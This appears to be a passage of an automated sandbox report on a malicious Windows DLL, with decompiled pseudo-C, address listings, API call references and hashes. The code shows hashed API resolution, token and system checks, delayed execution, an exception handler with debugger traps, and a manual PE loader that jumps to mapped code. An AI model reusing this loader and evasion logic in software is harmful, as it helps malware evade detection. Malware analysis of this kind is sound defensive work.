							_t320 =  *0x6ea0d1f8;
							 *((char*)(_t320 + 0x29)) = _t190;
							 *((intOrPtr*)(_t320 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
							if( *_t320 >= 0x10) {
								__eflags = 0xffffffffffffffff;
								 *((intOrPtr*)( *0x6ea0d1f8 + 0x2c)) = E6EA010A4(0xffffffffffffffff);
								L78:
								if(E6EA0306C(0x8e844d1e, 0x925d7fea, 0x8e844d1e, 0x8e844d1e) != 0) {
									GetSystemInfo(_t429 + 0x164); // executed
								}
								_t196 =  *0x6ea0d1f8;
								_t291 = _t429 + 0x178;
								_t409 = _t429 + 0x170;
								 *((short*)(_t196 + 0xe)) =  *_t291;
								 *((intOrPtr*)(_t196 + 0x10)) =  *((intOrPtr*)(_t291 - 0x10));
								 *((intOrPtr*)(_t196 + 0x14)) =  *((intOrPtr*)(_t291 - 0xc));
								 *((intOrPtr*)(_t196 + 0x18)) =  *_t409;
								 *((intOrPtr*)(_t196 + 0x1c)) =  *((intOrPtr*)(_t409 + 0x10));
								return _t196;
							}
							 *(_t429 + 0x19c) = 0;
							_t372 = E6EA0306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
							if(_t372 == 0) {
								L74:
								_t200 =  *0x6ea0d1f8;
								if( *((char*)(_t200 + 0x28)) == 0) {
									 *((intOrPtr*)(_t200 + 0x2c)) = 3;
								} else {
									 *((intOrPtr*)(_t200 + 0x2c)) = 5;
								}
								goto L78;
							}
							_push(_t429 + 0x19c);
							_push(8);
							_push(0xffffffff);
							if( *_t372() == 0) {
								_t203 = E6EA035F0(_t407);
								__eflags = _t203;
								if(_t203 != 0) {
									goto L74;
								}
							}
							 *(_t429 + 0x30) =  *(_t429 + 0x19c);
							 *((char*)(_t429 + 0x34)) = 1;
							 *(_t429 + 0x1a4) = 0;
							_t325 = E6EA0306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
							if(_t325 != 0) {
								_push(_t429 + 0x1a4);
								_push(0);
								_push(0);
								_push(1);
								_push( *(_t429 + 0x1ac));
								if( *_t325() == 0) {
									E6EA035F0(_t407);
								}
							}
							_t206 =  *(_t429 + 0x1a4);
							if( *(_t429 + 0x1a4) != 0) {
								E6E9FF584(_t429 + 0x18c, _t206);
								_t411 = E6EA0306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
								__eflags = _t411;
								if(_t411 == 0) {
									L133:
									E6E9FF654(_t429 + 0x188);
									goto L72;
								}
								_t212 = E6E9FF4BC(_t429 + 0x18c, 0);
								_t213 = E6E9FF4CC(_t429 + 0x188);
								_t215 =  *_t411( *(_t429 + 0x1ac), 1, _t212, _t213, _t429 + 0x1a4);
								__eflags = _t215;
								if(_t215 == 0) {
									_t216 = E6EA035F0(_t411);
									__eflags = _t216;
									if(_t216 != 0) {
										goto L133;
									}
								}
								_t423 = E6E9FF4BC(_t429 + 0x18c, 0);
								E6E9FDF4C(_t429 + 0x1b4, 0);
								 *(_t429 + 0x1ac) = 0;
								_t377 = E6EA0306C(0x150c05fc, 0xfc1a24a1, 0x150c05fc, 0x150c05fc);
								__eflags = _t377;
								if(_t377 != 0) {
									 *_t377( *_t423, _t429 + 0x1ac);
								}
								E6E9FDFC0(_t429 + 0x1b4,  *(_t429 + 0x1ac));
								_t223 = E6EA0306C(0x8e844d1e, 0xda6a2597, 0x8e844d1e, 0x8e844d1e);
								__eflags = _t223;
								if(_t223 != 0) {
									_push( *(_t429 + 0x1ac));
									asm("int3");
									asm("int3");
								}
								E6E9FE06C(_t429 + 0x1b8 - 8, _t429 + 0x1b8);
								_t425 = E6EA04FFC( *((intOrPtr*)(_t429 + 0x1b8)), E6E9FE8A8( *((intOrPtr*)(_t429 + 0x1b8)), 0x7fffffff));
								E6E9FDFA4(_t429 + 0x1b8);
								E6E9FDFA4(_t429 + 0x1b0);
								E6E9FF654(_t429 + 0x188);
								__eflags =  *((char*)(_t429 + 0x34));
								if( *((char*)(_t429 + 0x34)) != 0) {
									E6E9FBB44(_t429 + 0x30);
								}
								__eflags = _t425 - 0x6df4cf7;
								if(_t425 != 0x6df4cf7) {
									goto L74;
								} else {
									 *((intOrPtr*)( *0x6ea0d1f8 + 0x2c)) = 6;
									goto L78;
								}
							} else {
								L72:
								if( *((char*)(_t429 + 0x34)) != 0) {
									E6E9FBB44(_t429 + 0x30);
								}
								goto L74;
							}
						}
					}
					_push(_t429 + 0x198);
					_push(8);
					_push(0xffffffff);
					if( *_t363() == 0) {
						_t259 = E6EA035F0(_t404);
						__eflags = _t259;
						if(_t259 != 0) {
							goto L12;
						}
					}
					 *(_t429 + 0x14) =  *(_t429 + 0x198);
					 *((char*)(_t429 + 0x18)) = 1;
					 *(_t429 + 0x1a0) = 0;
					if(E6EA0306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) != 0) {
						_t288 = GetTokenInformation( *(_t429 + 0x1a8), 2, 0, 0, _t429 + 0x1a0); // executed
						if(_t288 == 0) {
							E6EA035F0(_t404);
						}
					}
					_t262 =  *(_t429 + 0x1a0);
					if( *(_t429 + 0x1a0) != 0) {
						E6E9FF584(_t429 + 0x3c, _t262);
						_t265 = E6EA0306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
						_t407 = _t265;
						__eflags = _t265;
						if(_t265 == 0) {
							L107:
							E6E9FF654(_t429 + 0x38);
							goto L10;
						}
						_t268 = E6E9FF4BC(_t429 + 0x3c, 0);
						_t271 = GetTokenInformation( *(_t429 + 0x1a8), 2, _t268, E6E9FF4CC(_t429 + 0x38), _t429 + 0x1a0); // executed
						__eflags = _t271;
						if(_t271 == 0) {
							_t272 = E6EA035F0(_t407);
							__eflags = _t272;
							if(_t272 != 0) {
								goto L107;
							}
						}
						_t427 = E6E9FF4BC(_t429 + 0x3c, 0);
						 *(_t429 + 0x1d8 - 0x30) = 0;
						asm("movsd");
						asm("movsb");
						asm("movsb");
						_t407 = E6EA0306C(0x150c05fc, 0x2351aaca, 0x150c05fc, 0x150c05fc);
						__eflags = _t407;
						if(_t407 == 0) {
							goto L107;
						}
						_t276 = _t429 + 0x1a8;
						_t277 =  *_t407(_t276 + 0x30, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, _t276);
						__eflags = _t277;
						if(_t277 == 0) {
							_t278 = E6EA035F0(_t407);
							__eflags = _t278;
							if(_t278 != 0) {
								goto L107;
							}
						}
						_t403 =  *(_t429 + 0x1a8);
						__eflags =  *_t427;
						if( *_t427 <= 0) {
							L101:
							__eflags = _t403;
							if(_t403 == 0) {
								L103:
								_t393 = 1;
								L105:
								__eflags = _t393;
								if(_t393 == 0) {
									E6EA00FD4(_t403, _t407, _t403);
								}
								goto L107;
							}
							__eflags = _t403 - 0xffffffff;
							if(_t403 != 0xffffffff) {
								_t393 = 0;
								__eflags = 0;
								goto L105;
							}
							goto L103;
						}
						_t413 = 0;
						__eflags = 0;
						do {
							_t282 = E6EA0306C(0x150c05fc, 0xb4757511, 0x150c05fc, 0x150c05fc);
							__eflags = _t282;
							if(_t282 == 0) {
								goto L100;
							}
							_push( *((intOrPtr*)(_t427 + 4 + _t413 * 8)));
							_push( *(_t429 + 0x1ac));
							asm("int3");
							asm("int3");
							__eflags = _t282;
							if(_t282 == 0) {
								goto L100;
							}
							__eflags = _t403;
							if(_t403 == 0) {
								L93:
								_t395 = 1;
								L95:
								__eflags = _t395;
								if(_t395 == 0) {
									E6EA00FD4(_t403, _t413, _t403);
								}
								E6E9FF654(_t429 + 0x38);
								__eflags =  *((char*)(_t429 + 0x18));
								if( *((char*)(_t429 + 0x18)) != 0) {
									E6E9FBB44(_t429 + 0x14);
								}
								_t364 = 1;
								goto L13;
							}
							__eflags = _t403 - 0xffffffff;
							if(_t403 != 0xffffffff) {
								_t395 = 0;
								__eflags = 0;
								goto L95;
							}
							goto L93;
							L100:
							_t413 = _t413 + 1;
							__eflags = _t413 -  *_t427;
						} while (_t413 <  *_t427);
						goto L101;
					}
					L10:
					if( *((char*)(_t429 + 0x18)) != 0) {
						E6E9FBB44(_t429 + 0x14);
					}
					goto L12;
				} else {
					return _t155;
				}
			}

0x6ea0073f
0x6ea00741
0x6ea00748
0x6ea00fc7
0x6ea00fcd
0x6ea00fcd
0x6ea00752
0x6ea0075e
0x6ea0076a
0x6ea0076f
0x6ea0077c
0x6ea0078d
0x6ea0078f
0x6ea00790
0x6ea00791
0x6ea00791
0x6ea00792
0x6ea00796
0x6ea0079a
0x6ea0079f
0x6ea007a2
0x6ea007a8
0x6ea007c2
0x6ea007c9
0x6ea007cc
0x6ea007cf
0x6ea007d1
0x6ea007dd
0x6ea007ea
0x6ea007f7
0x6ea007fb
0x6ea00887
0x6ea00887
0x6ea00889
0x6ea0088d
0x6ea00898
0x6ea008ae
0x6ea008b1
0x6ea008b1
0x6ea008b5
0x6ea008be
0x6ea008c3
0x6ea008c3
0x6ea008c5
0x6ea008d6
0x6ea008f8
0x6ea008fa
0x6ea008fb
0x6ea008ff
0x6ea008ff
0x6ea00908
0x6ea00914
0x6ea0091d
0x6ea00933
0x6ea00943
0x6ea00948
0x6ea0094c
0x6ea00951
0x6ea00953
0x6ea009a3
0x6ea009b8
0x6ea009bc
0x6ea009c1
0x6ea009d2
0x6ea009e7
0x6ea009eb
0x6ea009f0
0x6ea009f2
0x6ea00a39
0x6ea00a3c
0x6ea00a8a
0x6ea00a8d
0x6ea00ace
0x6ea00ad2
0x6ea00ad7
0x6ea00adc
0x6ea00afb
0x6ea00afb
0x6ea00afb
0x6ea00afd
0x00000000
0x6ea00afd
0x6ea00ade
0x6ea00ae2
0x6ea00ae4
0x6ea00aeb
0x6ea00aeb
0x6ea00af1
0x6ea00af1
0x6ea00af3
0x6ea00af6
0x6ea00af6
0x00000000
0x6ea00af3
0x6ea00ae6
0x6ea00ae9
0x6ea00aef
0x6ea00aef
0x00000000
0x6ea00aef
0x00000000
0x6ea00ae9
0x6ea00a8f
0x6ea00a92
0x00000000
0x00000000
0x6ea00a98
0x6ea00a9d
0x6ea00aa2
0x6ea00ac1
0x6ea00ac1
0x6ea00acb
0x00000000
0x6ea00acb
0x6ea00aa4
0x6ea00aa8
0x6ea00aaa
0x6ea00ab1
0x6ea00ab1
0x6ea00ab7
0x6ea00ab7
0x6ea00ab9
0x6ea00abc
0x6ea00abc
0x00000000
0x6ea00ab9
0x6ea00aac
0x6ea00aaf
0x6ea00ab5
0x6ea00ab5
0x00000000
0x6ea00ab5
0x00000000
0x6ea00aaf
0x6ea00a3e
0x6ea00a40
0x6ea00a7f
0x6ea00a82
0x6ea00df4
0x6ea00df9
0x6ea00dfe
0x6ea00e1d
0x6ea00e1d
0x6ea00e27
0x00000000
0x6ea00e27
0x6ea00e00
0x6ea00e04
0x6ea00e06
0x6ea00e0d
0x6ea00e0d
0x6ea00e13
0x6ea00e13
0x6ea00e15
0x6ea00e18
0x6ea00e18
0x00000000
0x6ea00e15
0x6ea00e08
0x6ea00e0b
0x6ea00e11
0x6ea00e11
0x00000000
0x6ea00e11
0x00000000
0x6ea00e0b
0x00000000
0x6ea00a88
0x6ea00a46
0x6ea00a4b
0x6ea00a50
0x6ea00a6f
0x6ea00a6f
0x6ea00a79
0x00000000
0x6ea00a79
0x6ea00a52
0x6ea00a56
0x6ea00a58
0x6ea00a5f
0x6ea00a5f
0x6ea00a65
0x6ea00a65
0x6ea00a67
0x6ea00a6a
0x6ea00a6a
0x00000000
0x6ea00a67
0x6ea00a5a
0x6ea00a5d
0x6ea00a63
0x6ea00a63
0x00000000
0x6ea00a63
0x00000000
0x6ea00a5d
0x6ea009f4
0x6ea009f6
0x00000000
0x00000000
0x6ea00a00
0x6ea00a05
0x6ea00a0a
0x6ea00a29
0x6ea00a29
0x6ea00a33
0x00000000
0x6ea00a33
0x6ea00a0c
0x6ea00a10
0x6ea00a12
0x6ea00a19
0x6ea00a19
0x6ea00a1f
0x6ea00a1f
0x6ea00a21
0x6ea00a24
0x6ea00a24
0x00000000
0x6ea00a21
0x6ea00a14
0x6ea00a17
0x6ea00a1d
0x6ea00a1d
0x00000000
0x6ea00a1d
0x00000000
0x6ea00a17
0x6ea00959
0x6ea0095e
0x6ea00963
0x6ea00982
0x6ea00982
0x6ea0098c
0x00000000
0x6ea0098c
0x6ea00965
0x6ea00969
0x6ea0096b
0x6ea00972
0x6ea00972
0x6ea00978
0x6ea00978
0x6ea0097a
0x6ea0097d
0x6ea0097d
0x00000000
0x6ea0097a
0x6ea0096d
0x6ea00970
0x6ea00976
0x6ea00976
0x00000000
0x6ea00976
0x00000000
0x6ea0089a
0x6ea0089c
0x6ea00b01
0x6ea00b06
0x6ea00b09
0x6ea00b0e
0x6ea00b10
0x6ea00b25
0x6ea00b28
0x6ea00bf6
0x6ea00bfe
0x6ea00c01
0x6ea00c16
0x6ea00c20
0x6ea00c20
0x6ea00c22
0x6ea00c24
0x6ea00c33
0x6ea00c3f
0x6ea00c43
0x6ea00c46
0x6ea00c49
0x6ea00c4c
0x00000000
0x6ea00c4c
0x6ea00b38
0x6ea00b4a
0x6ea00b4e
0x6ea00bda
0x6ea00bda
0x6ea00be0
0x6ea00beb
0x6ea00be2
0x6ea00be2
0x6ea00be2
0x00000000
0x6ea00be0
0x6ea00b5b
0x6ea00b5c
0x6ea00b5e
0x6ea00b64
0x6ea00fb3
0x6ea00fb8
0x6ea00fba
0x00000000
0x00000000
0x6ea00fc0
0x6ea00b7b
0x6ea00b7f
0x6ea00b84
0x6ea00b96
0x6ea00b9a
0x6ea00ba5
0x6ea00ba6
0x6ea00ba7
0x6ea00ba8
0x6ea00baa
0x6ea00bb5
0x6ea00e2d
0x6ea00e2d
0x6ea00bb5
0x6ea00bbb
0x6ea00bc4
0x6ea00e3f
0x6ea00e55
0x6ea00e57
0x6ea00e59
0x6ea00f94
0x6ea00f9b
0x00000000
0x6ea00f9b
0x6ea00e68
0x6ea00e76
0x6ea00e90
0x6ea00e92
0x6ea00e94
0x6ea00fa5
0x6ea00faa
0x6ea00fac
0x00000000
0x00000000
0x6ea00fae
0x6ea00ea8
0x6ea00eb3
0x6ea00ec2
0x6ea00ed4
0x6ea00ed6
0x6ea00ed8
0x6ea00ee5
0x6ea00ee5
0x6ea00ef5
0x6ea00f06
0x6ea00f0b
0x6ea00f0d
0x6ea00f0f
0x6ea00f16
0x6ea00f17
0x6ea00f17
0x6ea00f23
0x6ea00f44
0x6ea00f4d
0x6ea00f59
0x6ea00f65
0x6ea00f6a
0x6ea00f6f
0x6ea00f75
0x6ea00f75
0x6ea00f7a
0x6ea00f80
0x00000000
0x6ea00f86
0x6ea00f88
0x00000000
0x6ea00f88
0x6ea00bca
0x6ea00bca
0x6ea00bcf
0x6ea00bd5
0x6ea00bd5
0x00000000
0x6ea00bcf
0x6ea00bc4
0x6ea00898
0x6ea00808
0x6ea00809
0x6ea0080b
0x6ea00811
0x6ea00dde
0x6ea00de3
0x6ea00de5
0x00000000
0x00000000
0x6ea00deb
0x6ea00828
0x6ea0082c
0x6ea00831
0x6ea00847
0x6ea0085e
0x6ea00862
0x6ea00c5a
0x6ea00c5a
0x6ea00862
0x6ea00868
0x6ea00871
0x6ea00c69
0x6ea00c7a
0x6ea00c7f
0x6ea00c81
0x6ea00c83
0x6ea00db4
0x6ea00db8
0x00000000
0x6ea00db8
0x6ea00c8f
0x6ea00cb4
0x6ea00cb6
0x6ea00cb8
0x6ea00dd0
0x6ea00dd5
0x6ea00dd7
0x00000000
0x00000000
0x6ea00dd9
0x6ea00cc9
0x6ea00cd7
0x6ea00cde
0x6ea00cdf
0x6ea00ce0
0x6ea00cf2
0x6ea00cf4
0x6ea00cf6
0x00000000
0x00000000
0x6ea00cfe
0x6ea00d19
0x6ea00d1b
0x6ea00d1d
0x6ea00dc2
0x6ea00dc7
0x6ea00dc9
0x00000000
0x00000000
0x6ea00dcb
0x6ea00d23
0x6ea00d2a
0x6ea00d2e
0x6ea00d99
0x6ea00d99
0x6ea00d9b
0x6ea00da2
0x6ea00da2
0x6ea00da8
0x6ea00da8
0x6ea00daa
0x6ea00daf
0x6ea00daf
0x00000000
0x6ea00daa
0x6ea00d9d
0x6ea00da0
0x6ea00da6
0x6ea00da6
0x00000000
0x6ea00da6
0x00000000
0x6ea00da0
0x6ea00d30
0x6ea00d30
0x6ea00d32
0x6ea00d3e
0x6ea00d43
0x6ea00d45
0x00000000
0x00000000
0x6ea00d47
0x6ea00d4b
0x6ea00d52
0x6ea00d53
0x6ea00d54
0x6ea00d56
0x00000000
0x00000000
0x6ea00d58
0x6ea00d5a
0x6ea00d61
0x6ea00d61
0x6ea00d67
0x6ea00d67
0x6ea00d69
0x6ea00d6e
0x6ea00d6e
0x6ea00d77
0x6ea00d7c
0x6ea00d81
0x6ea00d87
0x6ea00d87
0x6ea00d8c
0x00000000
0x6ea00d8c
0x6ea00d5c
0x6ea00d5f
0x6ea00d65
0x6ea00d65
0x00000000
0x6ea00d65
0x00000000
0x6ea00d93
0x6ea00d93
0x6ea00d94
0x6ea00d94
0x00000000
0x6ea00d32
0x6ea00877
0x6ea0087c
0x6ea00882
0x6ea00882
0x00000000
0x6ea00c59
0x6ea00c59
0x6ea00c59

APIs

GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,150C05FC,150C05FC), ref: 6EA0085E
GetSystemInfo.KERNELBASE(?,8E844D1E,8E844D1E,?,?,360D0C74,?,?,1E55AAEC,?,?,C0092A94,00000000,80000002,00000000,-000000FC), ref: 6EA00C20
GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,00000000,150C05FC,150C05FC,00000000,150C05FC,150C05FC), ref: 6EA00CB4

Memory Dump Source

Source File: 00000001.00000002.810044742.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000001.00000002.810018026.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810134405.000000006EA0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810166840.000000006EA0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810188101.000000006EA0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken$InfoSystem
String ID:
API String ID: 298373132-0
Opcode ID: 541cefb869a6c4b31bc8d1ef7cc0c12768f6b36022c515ca4e4a89c71ae19b5a
Instruction ID: 70b45d62341910f3dd233bc24499e42d23a6060b1e56bdbca5b8497d9651597b
Opcode Fuzzy Hash: 541cefb869a6c4b31bc8d1ef7cc0c12768f6b36022c515ca4e4a89c71ae19b5a
Instruction Fuzzy Hash: 4722D570108341AFE760DFA4E9D0BEF77A9AF9230CF148C1DA49457295EB30D989CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 6EA02234, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E6EA02234(void* __ecx, intOrPtr __edx, void* __esi) {
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr* _t5;
				intOrPtr _t11;
				intOrPtr* _t13;
				intOrPtr* _t15;

				_t11 = __edx;
				if(__ecx == 0) {
					 *_t15 = 0;
					_v4 = 0;
				} else {
					 *_t15 = E6EA03AF8(0xffffd8f0, 0xffffffff, __ecx, 0);
					_v20 = _t11;
				}
				_t5 = E6EA0306C(0x60a28c5c, 0x11cab064, 0x60a28c5c, 0x60a28c5c);
				_t13 = _t5;
				if(_t13 != 0) {
					_t5 =  *_t13(0, _t15); // executed
				}
				return _t5;
			}

0x6ea02234
0x6ea02238
0x6ea02254
0x6ea02257
0x6ea0223a
0x6ea02249
0x6ea0224c
0x6ea0224c
0x6ea02267
0x6ea0226c
0x6ea02270
0x6ea02278
0x6ea02278
0x6ea0227c

APIs

NtDelayExecution.NTDLL(00000000,00000000,60A28C5C,60A28C5C,FFFFFFFF,FFFFFFFF,6E9F4B17,00000000,00000000,?), ref: 6EA02278

Memory Dump Source

Source File: 00000001.00000002.810044742.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000001.00000002.810018026.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810134405.000000006EA0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810166840.000000006EA0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810188101.000000006EA0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: 2c9c5e460e6a6f6e58fad2ac9a5298f00f0cc66bf3291dc41720851ba70b474b
Instruction ID: 98c1960d636a8440009c3243b29553f0213cd4d3ecf5330d1d1bc8614963a615
Opcode Fuzzy Hash: 2c9c5e460e6a6f6e58fad2ac9a5298f00f0cc66bf3291dc41720851ba70b474b
Instruction Fuzzy Hash: B9E065B050E312ADF7449AA9AC04F6F36D8AF84614F20892CB4A8D7184E67098818379

Uniqueness

Uniqueness Score: -1.00%

Function 6EA02820, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EA02820(void* __ecx, long __edx, void* __esi, long _a4, long _a8, void* _a12) {
				long _v4;
				void* _t8;
				long _t10;
				PVOID* _t19;

				_v4 = __edx;
				 *_t19 = __ecx;
				if(E6EA0306C(0x60a28c5c, 0x414fdf7, 0x60a28c5c, 0x60a28c5c) == 0) {
					L3:
					_t8 =  *_t19;
				} else {
					_t10 = NtAllocateVirtualMemory(_a12, _t19, 0,  &_v4, _a4, _a8); // executed
					if(_t10 == 0) {
						goto L3;
					} else {
						_t8 = 0;
					}
				}
				return _t8;
			}

0x6ea02827
0x6ea02830
0x6ea0283e
0x6ea02861
0x6ea02861
0x6ea02840
0x6ea02857
0x6ea0285b
0x00000000
0x6ea0285d
0x6ea0285d
0x6ea0285d
0x6ea0285b
0x6ea02866

APIs

NtAllocateVirtualMemory.NTDLL(6EA088E6,?,00000000,000000FF,6EA088E6,6EA088E6,60A28C5C,60A28C5C,?,?,6EA088E6,00003000,00000004,000000FF), ref: 6EA02857

Memory Dump Source

Source File: 00000001.00000002.810044742.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000001.00000002.810018026.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810134405.000000006EA0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810166840.000000006EA0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810188101.000000006EA0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 1b6e0df76e67549dfb1e774fc107f98af224613b3e03ad2134b0c600fba901d1
Instruction ID: ebf23638dfdcb00323e5a05e6bc1aa2c311cfe56f125fdf6cf0ccd7805fcc03a
Opcode Fuzzy Hash: 1b6e0df76e67549dfb1e774fc107f98af224613b3e03ad2134b0c600fba901d1
Instruction Fuzzy Hash: 1CE0397120A342AFFB08CE9ADC28E6BB7E9EF84608F148C2DB498C6250D730D8449735

Uniqueness

Uniqueness Score: -1.00%

Function 6EA03138, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E6EA03138(intOrPtr* __ecx) {
				void* _t1;

				_push(E6EA034B0);
				_push(1); // executed
				_t1 =  *__ecx(); // executed
				return _t1;
			}

0x6ea03138
0x6ea0313d
0x6ea0313f
0x6ea03141

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,6EA034B0,6EA03128,60A28C5C,60A28C5C,?,6E9F6C99,00000000), ref: 6EA0313F

Memory Dump Source

Source File: 00000001.00000002.810044742.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000001.00000002.810018026.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810134405.000000006EA0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810166840.000000006EA0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810188101.000000006EA0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: e4086d18b85c63013f01aa73ea710e34905b8fd80da78cc2cf1b05aa9b7837c1
Instruction ID: 828850ac5635bb239f87ac3f9f43d7c2a021d73a1bb3267058c0589a919ea520
Opcode Fuzzy Hash: e4086d18b85c63013f01aa73ea710e34905b8fd80da78cc2cf1b05aa9b7837c1
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 010011ED, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 230
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E010011ED(long __ebx, void* __edi, long __esi, intOrPtr* _a4) {
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* _v68;
				char* _v72;
				int _v76;
				long _v80;
				long _v84;
				DWORD* _v88;
				intOrPtr _v92;
				int _v96;
				intOrPtr* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				void* _v112;
				intOrPtr _v116;
				char* _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				signed int _v160;
				signed int _v164;
				intOrPtr _v168;
				int _v172;
				char* _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				char _v188;
				intOrPtr* _t137;
				int _t143;
				int _t151;
				int _t155;
				int _t182;
				unsigned int _t199;
				intOrPtr _t221;
				intOrPtr _t223;
				void* _t231;
				intOrPtr _t234;
				void* _t241;
				intOrPtr _t245;
				intOrPtr _t252;
				DWORD* _t265;
				void* _t269;
				intOrPtr* _t272;
				intOrPtr* _t273;

				_t137 = _a4;
				_v44 = 0;
				_t241 =  *((intOrPtr*)(_t137 + 0x38));
				 *0x1004418 = 1;
				asm("movaps xmm0, [0x1003010]");
				asm("movups [0x1004428], xmm0");
				_v48 = _t137;
				_v52 =  *((intOrPtr*)(_t137 + 0x20));
				_v56 =  *((intOrPtr*)(_v48 + 0x1c));
				_v188 = _t241;
				_v184 =  *((intOrPtr*)(_t137 + 0x18));
				_v180 = 4;
				_v176 =  &_v44;
				_v60 =  *((intOrPtr*)(_v48 + 0xc));
				_v64 = 4;
				_v68 = _t241;
				_v72 =  &_v44;
				_t143 = VirtualProtect(__edi, __ebx, __esi, _t265); // executed
				_v76 = _t143;
				_v188 = _v68;
				_v184 = 0;
				_v180 =  *((intOrPtr*)(_v48 + 0x18));
				_v80 = 0x400;
				_v84 = 2;
				_v88 =  &_v44;
				_v92 = 0;
				E01002798();
				E010017A5(_v68,  *_v48, _v52);
				E01002798( *_v48, 0, _v52);
				_t151 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
				_t272 = _t269 - 0x8c;
				_t231 = _v68;
				_t252 =  *((intOrPtr*)(_t231 + 0x3c));
				_v96 = _t151;
				_v100 = _v68 + 0x3c;
				_v104 = _t231;
				_v108 = _t252;
				if(_t252 != 0) {
					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v144 = _v104;
				if(_v60 != 0) {
					_v148 = _v144 + 0x18 + ( *(_v144 + 0x14) & 0x0000ffff);
					_v152 = 0;
					while(1) {
						_t221 = _v148;
						_t199 =  *(_t221 + 0x24);
						_v156 = _v152;
						_v160 = _t199 >> 0x0000001e & 0x00000001;
						_v164 = _t199 >> 0x1f;
						_v188 = _v68 +  *((intOrPtr*)(_t221 + 0xc));
						_v184 =  *((intOrPtr*)(_t221 + 8));
						_v180 =  *((intOrPtr*)(0x1004418 + (_v160 << 4) + (_v164 << 3) + ((_t199 >> 0x0000001d & 0x00000001) << 2)));
						_v176 =  &_v44;
						_v168 = _t221;
						_t182 = VirtualProtect(??, ??, ??, ??); // executed
						_t272 = _t272 - 0x10;
						_t223 = _v156 + 1;
						_v172 = _t182;
						_v148 = _v168 + 0x28;
						_v152 = _t223;
						if(_t223 == _v60) {
							goto L5;
						}
					}
				}
				L5:
				 *_t272 = _v68;
				_v116 = _v68 +  *((intOrPtr*)(_v48 + 0x14));
				_t155 = DisableThreadLibraryCalls(??);
				_t273 = _t272 - 4;
				_t234 =  *_v100;
				_v140 = _t155;
				_v136 = _t234;
				_v112 = _v68;
				if(_t234 == 0) {
					L2:
					_t245 = _v48;
					_v40 =  *((intOrPtr*)(_t245 + 0x34));
					_v36 =  *((intOrPtr*)(_t245 + 8));
					_v32 =  *((intOrPtr*)(_t245 + 0x30));
					_v28 =  *((intOrPtr*)(_t245 + 0x28));
					_v24 =  *((intOrPtr*)(_t245 + 0x50));
					_v20 = _v116;
					 *_t273 = _t245;
					_v188 = 0;
					_v184 = 0x74;
					_v120 =  &_v40;
					_v124 = 0;
					_v128 = 0x74;
					_v132 =  *((intOrPtr*)(_v112 + 0x28));
					E01002798();
					if(_v132 != 0) {
						_t272 =  *((intOrPtr*)( &_v40 + 0x10));
						goto __eax;
					}
					return 1;
				} else {
					_v112 = _v68 + (_v136 + 0x0000ffff & 0x0000ffff) + 1;
					goto L2;
				}
			}

0x010011f9
0x01001207
0x0100120e
0x01001211
0x0100121b
0x01001222
0x0100122c
0x01001232
0x0100123b
0x01001244
0x01001247
0x0100124b
0x01001253
0x0100125a
0x0100125d
0x01001260
0x01001263
0x01001266
0x01001280
0x01001286
0x01001289
0x01001291
